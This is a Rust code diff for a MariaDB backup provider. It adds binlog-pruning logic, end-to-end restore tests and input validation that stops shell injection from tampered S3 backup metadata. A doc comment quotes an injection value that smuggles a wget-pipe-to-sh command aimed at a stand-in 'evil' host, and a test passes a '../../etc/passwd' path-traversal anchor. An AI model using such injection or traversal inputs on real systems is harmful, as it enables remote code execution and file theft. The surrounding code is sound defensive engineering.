+         (base#1={anchor1}, base#2={anchor2}); without that this test proves nothing"
+    );
+
+    let before = fetch_binlog_manifest(&env.s3_client, service_name).await?;
+    assert!(
+        before.shipped_files.len() >= 3,
+        "need at least 3 shipped segments to prove partial pruning, got {:?}",
+        before.shipped_files
+    );
+    let last_shipped_before = before.last_shipped_file.clone();
+    assert!(
+        last_shipped_before.is_some(),
+        "manifest must record a high-water mark after shipping"
+    );
+
+    // ── Invariant 1: pruning against the OLDEST retained base's anchor keeps
+    //    that base's OWN segment and everything after it, and drops only what
+    //    predates it.
+    //
+    //    Note: this is NOT necessarily a no-op. `mariadb-backup` runs a FLUSH
+    //    of its own, so base #1's anchor is typically the segment *after* the
+    //    one the server started on — that earlier segment predates every
+    //    retained base and is genuinely unreachable, so deleting it is correct.
+    //    The invariant that matters is the boundary, not the count. ─────────
+    let expected_stale1: Vec<String> = before
+        .shipped_files
+        .iter()
+        .filter(|f| expect_strictly_older(f, &anchor1))
+        .cloned()
+        .collect();
+    let expected_kept1: Vec<String> = before
+        .shipped_files
+        .iter()
+        .filter(|f| !expect_strictly_older(f, &anchor1))
+        .cloned()
+        .collect();
+    eprintln!("DIAG prune anchor={anchor1} stale={expected_stale1:?} kept={expected_kept1:?}");
+    assert!(
+        expected_kept1.contains(&anchor1),
+        "base #1's own anchor segment ({anchor1}) must never be prunable against its own \
+         anchor — PITR replay starts there; manifest was {:?}",
+        before.shipped_files
+    );
+
+    let deleted1 = mariadb_svc
+        .prune_stale_binlogs(&env.s3_client, &s3_source_model, &anchor1)
+        .await
+        .map_err(|e| anyhow::anyhow!("prune_stale_binlogs(anchor of oldest base): {e}"))?;
+    assert_eq!(
+        deleted1,
+        expected_stale1.len(),
+        "pruning against the oldest retained base's anchor ({anchor1}) must delete exactly \
+         the segments that predate it (expected {expected_stale1:?})"
+    );
+    for file in &expected_stale1 {
+        assert!(
+            !object_exists(&env.s3_client, &binlog_segment_key(service_name, file)).await,
+            "segment {file} predates the oldest retained base and must be gone"
+        );
+    }
+    for file in &expected_kept1 {
+        assert!(
+            object_exists(&env.s3_client, &binlog_segment_key(service_name, file)).await,
+            "segment {file} is still reachable from base #1 and must survive"
+        );
+    }
+
+    let after1 = fetch_binlog_manifest(&env.s3_client, service_name).await?;
+    assert_eq!(
+        after1.shipped_files, expected_kept1,
+        "manifest must list exactly the segments still reachable from base #1"
+    );
+    assert_eq!(
+        after1.last_shipped_file, last_shipped_before,
+        "prune must NEVER rewind last_shipped_file — rewinding it re-ships every segment"
+    );
+
+    // ── Invariant 2: once base #1 ages out, base #2 becomes the oldest
+    //    retained base and its (later) anchor prunes strictly more —
+    //    but still nothing at-or-after itself. ──────────────────────────────
+    let expected_stale: Vec<String> = after1
+        .shipped_files
+        .iter()
+        .filter(|f| expect_strictly_older(f, &anchor2))
+        .cloned()
+        .collect();
+    let expected_kept: Vec<String> = after1
+        .shipped_files
+        .iter()
+        .filter(|f| !expect_strictly_older(f, &anchor2))
+        .cloned()
+        .collect();
+    eprintln!("DIAG prune anchor={anchor2} stale={expected_stale:?} kept={expected_kept:?}");
+    assert!(
+        !expected_stale.is_empty(),
+        "expected at least one prunable segment older than {anchor2}, manifest was {:?}",
+        after1.shipped_files
+    );
+    assert!(
+        !expected_kept.is_empty(),
+        "expected at least one retained segment at-or-after {anchor2}, manifest was {:?}",
+        after1.shipped_files
+    );
+    assert!(
+        expected_kept.contains(&anchor2),
+        "base #2's own anchor segment ({anchor2}) must survive a prune against its own anchor"
+    );
+
+    let deleted = mariadb_svc
+        .prune_stale_binlogs(&env.s3_client, &s3_source_model, &anchor2)
+        .await
+        .map_err(|e| anyhow::anyhow!("prune_stale_binlogs(anchor of new oldest base): {e}"))?;
+    assert_eq!(
+        deleted,
+        expected_stale.len(),
+        "prune must delete exactly the segments strictly older than {anchor2} \
+         (expected {expected_stale:?})"
+    );
+
+    // Objects really gone / really kept.
+    for file in &expected_stale {
+        assert!(
+            !object_exists(&env.s3_client, &binlog_segment_key(service_name, file)).await,
+            "pruned segment {file} must no longer exist in S3"
+        );
+    }
+    for file in &expected_kept {
+        assert!(
+            object_exists(&env.s3_client, &binlog_segment_key(service_name, file)).await,
+            "retained segment {file} must still exist in S3"
+        );
+    }
+
+    // Manifest rewritten to match, high-water mark untouched.
+    let after = fetch_binlog_manifest(&env.s3_client, service_name).await?;
+    assert_eq!(
+        after.shipped_files, expected_kept,
+        "manifest must list exactly the retained segments, in ship order"
+    );
+    assert_eq!(
+        after.last_shipped_file, last_shipped_before,
+        "prune must NEVER rewind last_shipped_file — rewinding it re-ships every segment"
+    );
+
+    // ── Invariant 3: repeat prune with the same anchor is a no-op ───────────
+    let deleted_again = mariadb_svc
+        .prune_stale_binlogs(&env.s3_client, &s3_source_model, &anchor2)
+        .await
+        .map_err(|e| anyhow::anyhow!("prune_stale_binlogs(repeat): {e}"))?;
+    assert_eq!(
+        deleted_again, 0,
+        "a repeat prune against the same anchor must be idempotent"
+    );
+    let after_repeat = fetch_binlog_manifest(&env.s3_client, service_name).await?;
+    assert_eq!(
+        after_repeat, after,
+        "an idempotent prune must leave the manifest byte-identical"
+    );
+    for file in &expected_kept {
+        assert!(
+            object_exists(&env.s3_client, &binlog_segment_key(service_name, file)).await,
+            "retained segment {file} must survive a repeat prune"
+        );
+    }
+
+    // ── Invariant 4: fail closed on an unorderable/unsafe anchor ────────────
+    let err = mariadb_svc
+        .prune_stale_binlogs(&env.s3_client, &s3_source_model, "../../etc/passwd")
+        .await
+        .expect_err("an unsafe anchor must be rejected, not acted on");
+    eprintln!("DIAG unsafe-anchor rejection: {err}");
+    for file in &expected_kept {
+        assert!(
+            object_exists(&env.s3_client, &binlog_segment_key(service_name, file)).await,
+            "retained segment {file} must survive a rejected prune"
+        );
+    }
+
+    Ok(())
+}
+
+// ─────────────────────────────────────────────────────────────────────────────
+// E2E #3 — logical (`mariadb_dump`) backup + restore-to-new-service.
+// ─────────────────────────────────────────────────────────────────────────────
+
+/// Root/app credentials for the RESTORE TARGET. They are deliberately different
+/// from the origin's (`ROOT_PASSWORD`) — that is exactly the state
+/// `credential_propagation_gates` produces for a `mariadb_dump` restore, which
+/// returns `(false, false)` and therefore does NOT merge the origin's
+/// credentials into the config handed to the provider.
+const RESTORED_ROOT_PASSWORD: &str = "target-root-pw-9876";
+const RESTORED_APP_USER: &str = "appuser";
+const RESTORED_APP_PASSWORD: &str = "target-app-pw-9876";
+
+/// `ServiceConfig.parameters` for the restore target. Mirrors `mariadb_params`
+/// but with the target's OWN credentials and a non-root app user (the MariaDB
+/// entrypoint refuses `MARIADB_USER=root`).
+fn restored_mariadb_params(service_name: &str) -> serde_json::Value {
+    serde_json::json!({
+        "host": "localhost",
+        "database": "appdb",
+        "username": RESTORED_APP_USER,
+        "password": RESTORED_APP_PASSWORD,
+        "root_password": RESTORED_ROOT_PASSWORD,
+        "docker_image": "mariadb:lts",
+        "container_name": format!("mariadb-{service_name}"),
+    })
+}
+
+/// Full logical-dump round trip: REAL `MariadbDumpEngine` -> real `dump.sql.gz`
+/// in real object storage -> REAL `restore_to_new_service` into a real new
+/// container.
+///
+/// Two things nothing else covers end-to-end:
+///
+///  1. The dump engine's output is actually restorable — no e2e test exercised
+///     `mariadb_dump` at all before this one.
+///  2. The M-2 credential fix. `credential_propagation_gates` returns
+///     `(false, false)` for `mariadb_dump` because the dump excludes the
+///     `mysql` schema, so the restored server must keep the TARGET's own
+///     credentials. Only a unit test asserted the boolean today; this proves
+///     the restored container really authenticates with the target's password
+///     and really REJECTS the origin's.
+#[tokio::test(flavor = "multi_thread", worker_threads = 4)]
+async fn mariadb_pitr_full_chain_e2e_logical_dump_restore_keeps_target_credentials() {
+    tokio::time::timeout(E2E_TIMEOUT, mariadb_logical_dump_restore_inner())
+        .await
+        .expect("MariaDB logical dump restore E2E timed out")
+}
+
+async fn mariadb_logical_dump_restore_inner() {
+    let Some(env) = setup_e2e_env("dump").await else {
+        return;
+    };
+    run_logical_dump_restore_flow(&env)
+        .await
+        .expect("logical dump restore end-to-end flow");
+}
+
+async fn run_logical_dump_restore_flow(env: &E2eEnv) -> anyhow::Result<()> {
+    let pool: &temps_database::DbConnection = env.pool.as_ref();
+    let service_name = env.service_name.as_str();
+    eprintln!(
+        "Running logical-dump flow against source container {}",
+        env.container_name
+    );
+    let encryption = Arc::new(EncryptionService::new(MASTER_KEY_HEX)?);
+
+    let (service_model, s3_source_model, user_id) = seed_service_rows(
+        pool,
+        &encryption,
+        service_name,
+        env.mariadb_port,
+        env.minio_port,
+    )
+    .await?;
+
+    // ── Seed real user data on the origin ───────────────────────────────────
+    let src = mysql_pool(env.mariadb_port).await?;
+    sqlx::query("CREATE DATABASE IF NOT EXISTS appdb")
+        .execute(&src)
+        .await?;
+    sqlx::query(
+        "CREATE TABLE IF NOT EXISTS appdb.events (id INT PRIMARY KEY AUTO_INCREMENT, batch CHAR(1) NOT NULL, note VARCHAR(64))",
+    )
+    .execute(&src)
+    .await?;
+    for i in 0..7 {
+        sqlx::query("INSERT INTO appdb.events (batch, note) VALUES ('A', ?)")
+            .bind(format!("a{i}"))
+            .execute(&src)
+            .await?;
+    }
+    let seeded: i64 = sqlx::query_scalar("SELECT COUNT(*) FROM appdb.events")
+        .fetch_one(&src)
+        .await?;
+    assert_eq!(seeded, 7, "origin rows seeded");
+    src.close().await;
+
+    // ── REAL logical dump engine ────────────────────────────────────────────
+    let engine = temps_backup::engines::mariadb_dump::MariadbDumpEngine::new(
+        temps_backup::engines::mariadb_dump::MariadbDumpDeps {
+            db: Arc::clone(&env.pool),
+            encryption_service: Arc::clone(&encryption),
+            docker: env.docker.clone(),
+        },
+    );
+    let (dump_location, backup_model) = run_engine_backup(
+        &env.pool,
+        &engine,
+        "mariadb_dump",
+        "logical-dump",
+        service_model.id,
+        s3_source_model.id,
+        user_id,
+    )
+    .await?;
+    assert!(
+        dump_location.ends_with("dump.sql.gz"),
+        "engine should produce a logical dump, got {dump_location}"
+    );
+    assert!(
+        env.s3_client
+            .head_object()
+            .bucket(BUCKET)
+            .key(&dump_location)
+            .send()
+            .await
+            .is_ok(),
+        "dump object must exist in MinIO at {dump_location}"
+    );
+    // This is the exact predicate `credential_propagation_gates` keys off to
+    // decide (false, false) for MariaDB — assert it on the REAL produced key.
+    assert!(
+        !MariaDbService::is_physical_base_location(&dump_location),
+        "a logical dump must not classify as a physical base ({dump_location}); \
+         if it did, the restore would merge the ORIGIN's credentials"
+    );
+
+    // ── REAL restore into a new service with the TARGET's own credentials ───
+    let decrypted_s3_source = {
+        let mut m = s3_source_model.clone();
+        m.access_key_id = encryption.decrypt_string(&s3_source_model.access_key_id)?;
+        m.secret_key = encryption.decrypt_string(&s3_source_model.secret_key)?;
+        m
+    };
+    let s3_credentials = S3Credentials {
+        access_key_id: MINIO_ACCESS_KEY.to_string(),
+        secret_key: MINIO_SECRET_KEY.to_string(),
+        region: "us-east-1".to_string(),
+        endpoint: decrypted_s3_source.endpoint.clone(),
+        bucket_name: BUCKET.to_string(),
+        bucket_path: String::new(),
+        force_path_style: true,
+    };
+
+    let restored_name = format!("{service_name}-dumprestore");
+    let source_config = ServiceConfig {
+        name: restored_name.clone(),
+        service_type: ServiceType::Mariadb,
+        version: None,
+        // No origin-credential merge: this is what the (false, false) gate
+        // hands the provider for a `mariadb_dump` restore.
+        parameters: restored_mariadb_params(&restored_name),
+    };
+
+    let mariadb_svc = MariaDbService::new(service_name.to_string(), Arc::new(env.docker.clone()));
+    let restore_ctx = RestoreContext {
+        s3_client: &env.s3_client,
+        s3_credentials: &s3_credentials,
+        s3_source: &decrypted_s3_source,
+        backup: &backup_model,
+        backup_location: &dump_location,
+        source_service: &service_model,
+        source_config,
+        pool,
+    };
+
+    // Register the container for reaping BEFORE the restore runs: the provider
+    // creates it partway through, and a mid-restore failure must not leak it.
+    let restored_container = format!("mariadb-{restored_name}");
+    let _restored_guard = ContainerGuard {
+        docker: env.docker.clone(),
+        id: restored_container.clone(),
+        label: restored_container.clone(),
+    };
+    let restored_volume = format!("mariadb_data_{restored_name}");
+
+    let result = mariadb_svc
+        .restore_to_new_service(restore_ctx, restored_name.clone(), serde_json::Value::Null)
+        .await
+        .map_err(|e| anyhow::anyhow!("restore_to_new_service: {e}"))?;
+    eprintln!("Restore produced new service: {}", result.connection_info);
+
+    let restored_port: u16 = result
+        .parameters
+        .get("port")
+        .and_then(|p| p.parse().ok())
+        .ok_or_else(|| {
+            anyhow::anyhow!(
+                "restored service has no port param: {:?}",
+                result.parameters
+            )
+        })?;
+    eprintln!("Restored MariaDB on host port {restored_port}");
+
+    // ── Assert: the target's OWN root password works ────────────────────────
+    let restored = {
+        let conn = format!("mysql://root:{RESTORED_ROOT_PASSWORD}@127.0.0.1:{restored_port}/");
+        let mut pool = None;
+        for attempt in 0..30 {
+            match MySqlPoolOptions::new()
+                .max_connections(1)
+                .acquire_timeout(Duration::from_secs(3))
+                .connect(&conn)
+                .await
+            {
+                Ok(p) => {
+                    pool = Some(p);
+                    break;
+                }
+                Err(_) if attempt < 29 => tokio::time::sleep(Duration::from_millis(750)).await,
+                Err(e) => {
+                    return Err(anyhow::anyhow!(
+                        "restored MariaDB rejected the TARGET's own root password — the \
+                         logical-dump restore must not overwrite the target's credentials: {e}"
+                    ))
+                }
+            }
+        }
+        pool.ok_or_else(|| {
+            anyhow::anyhow!(
+                "restored MariaDB never accepted the TARGET's own root password; the \
+                 logical-dump restore must leave mysql.user untouched"
+            )
+        })?
+    };
+
+    // ── Assert: the data really round-tripped ───────────────────────────────
+    let restored_rows: i64 = sqlx::query_scalar("SELECT COUNT(*) FROM appdb.events")
+        .fetch_one(&restored)
+        .await?;
+    let batch_a: i64 = sqlx::query_scalar("SELECT COUNT(*) FROM appdb.events WHERE batch='A'")
+        .fetch_one(&restored)
+        .await?;
+    eprintln!(
+        "Restored logical-dump row counts - total={restored_rows} A={batch_a} (expected 7/7)"
+    );
+    assert_eq!(restored_rows, 7, "all dumped rows must be restored");
+    assert_eq!(batch_a, 7, "restored rows must carry their original values");
+    restored.close().await;
+
+    // ── The key assertion: the ORIGIN's root password must NOT work ─────────
+    // `mariadb_dump` excludes the `mysql` schema, so nothing in the dump can
+    // replace the target's `mysql.user`. If this ever succeeds, the restore
+    // propagated origin credentials it had no business propagating.
+    let origin_conn = format!("mysql://root:{ROOT_PASSWORD}@127.0.0.1:{restored_port}/");
+    let origin_auth = MySqlPoolOptions::new()
+        .max_connections(1)
+        .acquire_timeout(Duration::from_secs(5))
+        .connect(&origin_conn)
+        .await;
+    match origin_auth {
+        Ok(p) => {
+            p.close().await;
+            panic!(
+                "SECURITY: the restored service accepted the ORIGIN's root password. A \
+                 mariadb_dump restore must never propagate the origin's credentials \
+                 (credential_propagation_gates returns (false, false) for this format)."
+            );
+        }
+        Err(e) => {
+            let msg = e.to_string();
+            eprintln!("Origin password correctly rejected by restored service: {msg}");
+            assert!(
+                msg.contains("1045") || msg.to_lowercase().contains("access denied"),
+                "expected an authentication failure (1045 / access denied) when using the \
+                 origin's password, got a different error: {msg}"
+            );
+        }
+    }
+
+    // Best-effort: remove the restored data volume so it doesn't leak.
+    let _ = env
+        .docker
+        .remove_volume(
+            &restored_volume,
+            Some(bollard::query_parameters::RemoveVolumeOptions { force: true }),
+        )
+        .await;
+
+    Ok(())
+}
+
 /// Build the provider-side `MariaDbConfig` indirectly: the provider parses a
 /// `ServiceConfig` internally, so we hand `archive_binlogs` a config by
 /// round-tripping through the same parameters. The provider's `archive_binlogs`

--- a/crates/temps-providers/src/externalsvc/mariadb.rs
+++ b/crates/temps-providers/src/externalsvc/mariadb.rs
@@ -1630,6 +1630,223 @@ impl MariaDbService {
         }
     }
 
+    // ── Binary-log retention (PITR "prune what nothing can need" half) ─────
+    //
+    // `archive_binlogs` only ever ADDS objects. Without a counterpart the
+    // `binlog/` prefix grows without bound for the life of the service, which
+    // on a busy database is the single largest unbounded S3 cost Temps can
+    // create. The Postgres side gets this for free (`wal-g delete garbage
+    // ARCHIVES` during a backup delete); MariaDB's archiver is ours, so the
+    // pruning is ours too.
+    //
+    // The retention rule is the same one WAL-G applies: a segment is
+    // unreachable once NO retained base backup could ever replay it. PITR
+    // replay always starts at the base's own recorded `binlog_file`, so the
+    // anchor is the coordinate of the OLDEST base backup still retained.
+    // Everything strictly older than that anchor is dead weight.
+    //
+    // This deletes real backup data, so every uncertainty resolves to "keep":
+    // no anchor => no deletion, unorderable filename => no deletion, failed
+    // delete => stop and leave the manifest claiming the segment is present.
+
+    /// Split a binlog filename into (basename, numeric suffix) — e.g.
+    /// `mysql-bin.000123` -> `("mysql-bin", "000123")`. `None` when the name
+    /// is not MariaDB's `NAME.NNNNNN` shape.
+    pub(crate) fn split_binlog_name(file: &str) -> Option<(&str, &str)> {
+        let (base, suffix) = file.rsplit_once('.')?;
+        if base.is_empty() || suffix.is_empty() || !suffix.chars().all(|c| c.is_ascii_digit()) {
+            return None;
+        }
+        Some((base, suffix))
+    }
+
+    /// Whether `candidate` is *provably* an older segment than `anchor`.
+    ///
+    /// The rest of the binlog code (`binlogs_to_ship`, `fetch_binlogs_for_replay`)
+    /// orders segments lexicographically, which is only equivalent to numeric
+    /// ordering while the zero-padded suffix keeps a fixed width. Shipping /
+    /// replaying under a violated assumption merely re-ships or over-replays;
+    /// DELETING under one destroys recovery data. So this predicate demands
+    /// the strong form — same basename, same suffix width — and answers
+    /// `false` (keep) for anything it cannot order with certainty.
+    pub(crate) fn binlog_is_strictly_older(candidate: &str, anchor: &str) -> bool {
+        match (
+            Self::split_binlog_name(candidate),
+            Self::split_binlog_name(anchor),
+        ) {
+            (Some((candidate_base, candidate_seq)), Some((anchor_base, anchor_seq))) => {
+                candidate_base == anchor_base
+                    && candidate_seq.len() == anchor_seq.len()
+                    && candidate_seq < anchor_seq
+            }
+            _ => false,
+        }
+    }
+
+    /// Read the PITR anchor (`binlog_file`) out of a physical base backup's
+    /// `metadata.json` companion.
+    ///
+    /// `Ok(None)` when the location is not a physical base, or the base was
+    /// taken with binary logging off (`pitr: false` / empty `binlog_file`) —
+    /// such a base records no replay start, so it cannot justify retaining any
+    /// binlog segment. Errors (missing/unparseable companion) propagate so the
+    /// caller can decline to prune rather than guess.
+    pub async fn base_binlog_anchor(
+        &self,
+        s3_client: &aws_sdk_s3::Client,
+        bucket: &str,
+        base_location: &str,
+    ) -> Result<Option<String>> {
+        let base_key = Self::backup_key_from_location(base_location, bucket);
+        if !Self::is_physical_base_location(&base_key) {
+            return Ok(None);
+        }
+        let metadata = self
+            .fetch_base_metadata(s3_client, bucket, &base_key)
+            .await?;
+        let pitr = metadata
+            .get("pitr")
+            .and_then(|v| v.as_bool())
+            .unwrap_or(false);
+        let file = metadata
+            .get("binlog_file")
+            .and_then(|v| v.as_str())
+            .unwrap_or("");
+        if !pitr || file.is_empty() {
+            return Ok(None);
+        }
+        if !is_safe_binlog_file_name(file) {
+            return Err(anyhow::anyhow!(
+                "Base metadata for s3://{}/{} records an unsafe binlog_file '{}'; \
+                 refusing to use it as a retention anchor",
+                bucket,
+                base_key,
+                file
+            ));
+        }
+        Ok(Some(file.to_string()))
+    }
+
+    /// Delete archived binlog segments strictly older than
+    /// `oldest_retained_binlog_file` and rewrite the manifest to match.
+    /// Returns the number of S3 objects deleted.
+    ///
+    /// The caller supplies the anchor: the `binlog_file` coordinate of the
+    /// OLDEST base backup still retained for this service (see
+    /// [`Self::base_binlog_anchor`]). Passing the anchor of anything other
+    /// than the oldest retained base would delete segments a retained base
+    /// still needs, so callers must not shortcut it.
+    ///
+    /// Only segments listed in the manifest are considered — an object in the
+    /// `binlog/` prefix that the manifest does not claim is left alone rather
+    /// than swept, because the manifest is the only record of what this
+    /// service actually shipped.
+    ///
+    /// `last_shipped_file` is never modified: it is the high-water mark that
+    /// gates future shipping, and rewinding it would re-ship every segment.
+    ///
+    /// Shares the archiver's read-modify-write manifest race (health checks run
+    /// concurrently across services, sequentially per service). It is benign
+    /// here for the same reason: a concurrent archive can only ADD segments
+    /// newer than the anchor, never resurrect one older than it, so the worst
+    /// case is a clobbered manifest that the next archive run re-writes.
+    pub async fn prune_stale_binlogs(
+        &self,
+        s3_client: &aws_sdk_s3::Client,
+        s3_source: &temps_entities::s3_sources::Model,
+        oldest_retained_binlog_file: &str,
+    ) -> Result<usize> {
+        if !is_safe_binlog_file_name(oldest_retained_binlog_file) {
+            return Err(anyhow::anyhow!(
+                "Refusing to prune binlogs against unsafe anchor '{}'",
+                oldest_retained_binlog_file
+            ));
+        }
+
+        let bucket = &s3_source.bucket_name;
+        let prefix = s3_source.bucket_path.trim_matches('/');
+
+        let mut manifest = self
+            .read_binlog_manifest(s3_client, bucket, prefix, &self.name)
+            .await?;
+        if manifest.shipped_files.is_empty() {
+            return Ok(0);
+        }
+
+        let stale: Vec<String> = manifest
+            .shipped_files
+            .iter()
+            .filter(|file| Self::binlog_is_strictly_older(file, oldest_retained_binlog_file))
+            .cloned()
+            .collect();
+        if stale.is_empty() {
+            return Ok(0);
+        }
+
+        let mut deleted: Vec<String> = Vec::with_capacity(stale.len());
+        for file in &stale {
+            let key = Self::binlog_object_key(prefix, &self.name, file);
+            match s3_client
+                .delete_object()
+                .bucket(bucket)
+                .key(&key)
+                .send()
+                .await
+            {
+                Ok(_) => {
+                    deleted.push(file.clone());
+                }
+                Err(e) => {
+                    // Stop at the first failure and keep the manifest honest:
+                    // an entry we could not delete stays listed as present.
+                    warn!(
+                        service = %self.name,
+                        binlog = %file,
+                        "Failed to delete stale MariaDB binlog s3://{}/{}, stopping prune run: {}",
+                        bucket, key, e
+                    );
+                    break;
+                }
+            }
+        }
+
+        if deleted.is_empty() {
+            return Ok(0);
+        }
+
+        manifest
+            .shipped_files
+            .retain(|file| !deleted.contains(file));
+        manifest.updated_at = chrono::Utc::now().to_rfc3339();
+        if let Err(e) = self
+            .write_binlog_manifest(s3_client, bucket, prefix, &manifest)
+            .await
+        {
+            // The objects are gone; only the bookkeeping write failed. Surface
+            // it — a manifest that still lists deleted segments makes the next
+            // PITR fail loudly on a 404 download instead of silently skipping
+            // them, which is the outcome we want, but the operator should know.
+            return Err(anyhow::anyhow!(
+                "Deleted {} stale MariaDB binlog segment(s) but failed to update the manifest \
+                 (it still lists them; the next PITR will fail on a missing segment until the \
+                 next successful archive run rewrites it): {}",
+                deleted.len(),
+                e
+            ));
+        }
+
+        // Debug, not info: the caller logs the operator-facing summary with
+        // the service id attached. Two info lines per prune is just noise.
+        debug!(
+            service = %self.name,
+            deleted = deleted.len(),
+            anchor = %oldest_retained_binlog_file,
+            "Deleted MariaDB binlog segments older than the oldest retained physical base"
+        );
+
+        Ok(deleted.len())
+    }
+
     async fn dump_all_databases_to_gzip_file(
         &self,
         config: &MariaDbConfig,
@@ -1826,7 +2043,13 @@ impl MariaDbService {
 
     /// True when this backup location is a physical (`mariadb-backup` mbstream)
     /// base — the only kind PITR can replay onto.
-    pub(crate) fn is_physical_base_location(location: &str) -> bool {
+    ///
+    /// `pub` because the generic restore orchestrator (`temps-backup`) has to
+    /// classify a MariaDB backup location the *same* way this engine does when
+    /// it builds the restore plan preview. Two independent copies of the
+    /// predicate would let the preview promise a physical restore the executor
+    /// then performs logically (or vice versa).
+    pub fn is_physical_base_location(location: &str) -> bool {
         location.ends_with("base.mbstream.gz")
     }
 
@@ -2506,7 +2729,15 @@ impl MariaDbService {
         // `$BINLOG` is resolved at run time in the shell below — mariadb:lts
         // ships `mariadb-binlog`, not `mysqlbinlog`.
         let mut binlog_args = String::from("\"$BINLOG\" --disable-log-bin");
-        binlog_args.push_str(&format!(" --start-position={}", start_position));
+        // `start_position` originates in an S3-hosted `metadata.json` that any
+        // writer to the bucket can tamper with, and it is interpolated into a
+        // shell command. Re-validate at the sink (callers validate on read too)
+        // and quote it like every other value in this script.
+        let start_position = Self::validate_binlog_position(start_position)?;
+        binlog_args.push_str(&format!(
+            " --start-position={}",
+            Self::shell_single_quote(&start_position)
+        ));
         if let Some((flag, value)) = &stop_flag {
             // Quote the value (datetimes contain a space).
             binlog_args.push_str(&format!(" {}={}", flag, Self::shell_single_quote(value)));
@@ -2523,6 +2754,15 @@ impl MariaDbService {
         // before the client runs) and only then feed it to the client — this
         // surfaces a broken replay as an error rather than a silent
         // half-apply masked by the client's exit code in a pipe.
+        // `set -x` traces every command AFTER parameter expansion, and
+        // `run_exec` folds that trace into the error text of a failed exec —
+        // which lands verbatim in the UNENCRYPTED `restore_runs.error_message`
+        // column, the server log stream, and the console/CLI run detail. So no
+        // traced line may contain a secret: the client authenticates via the
+        // `MYSQL_PWD`/`MARIADB_PWD` exec env (which `set -x` never prints),
+        // exactly like every other exec in this file, and the password is not
+        // on argv. The trace is worth keeping — it is the only diagnostic a
+        // self-hosted operator gets when a replay fails mid-script.
         let replay_file = "/var/tmp/temps-pitr-replay.sql";
         let replay_cmd = format!(
             "set -ex; \
@@ -2532,7 +2772,7 @@ impl MariaDbService {
              timeout 120s {binlog} > {file}; \
              ls -lh {file}; \
              echo temps-mariadb-pitr-replay: apply-sql; \
-             timeout 120s \"$CLIENT\" --protocol=TCP -h127.0.0.1 -P3306 --connect-timeout=10 -uroot --password=\"$MARIADB_ROOT_PASSWORD\" --binary-mode=1 < {file}; \
+             timeout 120s \"$CLIENT\" --protocol=TCP -h127.0.0.1 -P3306 --connect-timeout=10 -uroot --binary-mode=1 < {file}; \
              rm -f {file}; \
              echo temps-mariadb-pitr-replay: complete",
             binlog = binlog_args,
@@ -2542,7 +2782,6 @@ impl MariaDbService {
         let env = vec![
             format!("MYSQL_PWD={}", config.root_password),
             format!("MARIADB_PWD={}", config.root_password),
-            format!("MARIADB_ROOT_PASSWORD={}", config.root_password),
         ];
 
         info!(
@@ -2737,6 +2976,34 @@ impl MariaDbService {
     /// POSIX single-quote escape for embedding a value in an `sh -c` string.
     pub(crate) fn shell_single_quote(s: &str) -> String {
         format!("'{}'", s.replace('\'', "'\\''"))
+    }
+
+    /// Validate a binlog byte-offset that came from an UNTRUSTED source before
+    /// it is used to build the `mariadb-binlog` replay command.
+    ///
+    /// The value is read out of the base backup's `metadata.json` companion
+    /// object on S3 — a bucket that operators, other Temps instances, and
+    /// anything holding the bucket's credentials can write to. It is
+    /// interpolated into an `sh -c` script, so a value like
+    /// `4; wget http://evil/x -O-|sh; echo ` would otherwise execute inside the
+    /// restored database container.
+    ///
+    /// A real position is always the decimal byte offset reported by
+    /// `SHOW MASTER STATUS`, so anything else is corruption or an attack.
+    /// Reject it with a clear error instead of silently falling back to a
+    /// default position — a PITR that quietly replays from the wrong offset is
+    /// worse than one that refuses to start.
+    pub(crate) fn validate_binlog_position(raw: &str) -> Result<String> {
+        // 20 digits covers u64::MAX; binlog offsets never approach it.
+        if raw.is_empty() || raw.len() > 20 || !raw.chars().all(|c| c.is_ascii_digit()) {
+            return Err(anyhow::anyhow!(
+                "Invalid binlog_position {:?} in MariaDB base backup metadata: expected a \
+                 decimal byte offset of 1-20 digits. Refusing to run point-in-time recovery \
+                 with an untrusted position.",
+                raw
+            ));
+        }
+        Ok(raw.to_string())
     }
 }
 
@@ -3446,10 +3713,14 @@ impl ExternalService for MariaDbService {
                 binlog_file
             ));
         }
+        // Validate BEFORE any container work: `binlog_position` is free-form
+        // text from an S3-hosted `metadata.json` that ends up interpolated into
+        // the replay shell command, so a tampered base must fail here — loudly,
+        // with nothing destroyed — rather than deep inside the replay script.
         let start_position = if binlog_position.is_empty() {
             "4".to_string() // binlog header size; replay the whole first segment
         } else {
-            binlog_position
+            Self::validate_binlog_position(&binlog_position)?
         };
 
         info!(
@@ -4034,6 +4305,68 @@ mod tests {
     }
 
     #[test]
+    fn split_binlog_name_accepts_only_name_dot_digits() {
+        assert_eq!(
+            MariaDbService::split_binlog_name("mysql-bin.000123"),
+            Some(("mysql-bin", "000123"))
+        );
+        // Multi-dot basename: only the LAST dot separates the sequence.
+        assert_eq!(
+            MariaDbService::split_binlog_name("my.host-bin.000001"),
+            Some(("my.host-bin", "000001"))
+        );
+        assert_eq!(MariaDbService::split_binlog_name("mysql-bin.index"), None);
+        assert_eq!(MariaDbService::split_binlog_name("mysql-bin"), None);
+        assert_eq!(MariaDbService::split_binlog_name(".000001"), None);
+        assert_eq!(MariaDbService::split_binlog_name("mysql-bin."), None);
+    }
+
+    #[test]
+    fn binlog_ordering_is_strict_and_refuses_to_guess() {
+        // Ordinary case: same basename, same width.
+        assert!(MariaDbService::binlog_is_strictly_older(
+            "mysql-bin.000009",
+            "mysql-bin.000010"
+        ));
+        assert!(!MariaDbService::binlog_is_strictly_older(
+            "mysql-bin.000010",
+            "mysql-bin.000010"
+        ));
+        assert!(!MariaDbService::binlog_is_strictly_older(
+            "mysql-bin.000011",
+            "mysql-bin.000010"
+        ));
+
+        // Different basename: a segment from a differently-named log file is
+        // NOT comparable, so it must never be deleted.
+        assert!(!MariaDbService::binlog_is_strictly_older(
+            "other-bin.000001",
+            "mysql-bin.000010"
+        ));
+
+        // Different suffix width: lexicographic order stops matching numeric
+        // order, so we refuse rather than delete the wrong segment.
+        assert!(!MariaDbService::binlog_is_strictly_older(
+            "mysql-bin.0000009",
+            "mysql-bin.000010"
+        ));
+        assert!(!MariaDbService::binlog_is_strictly_older(
+            "mysql-bin.9",
+            "mysql-bin.000010"
+        ));
+
+        // Unparsable names are never deletable.
+        assert!(!MariaDbService::binlog_is_strictly_older(
+            "mysql-bin.index",
+            "mysql-bin.000010"
+        ));
+        assert!(!MariaDbService::binlog_is_strictly_older(
+            "mysql-bin.000009",
+            "not-a-binlog"
+        ));
+    }
+
+    #[test]
     fn binlog_object_key_handles_empty_and_nonempty_prefix() {
         // Non-empty bucket_path prefix.
         assert_eq!(
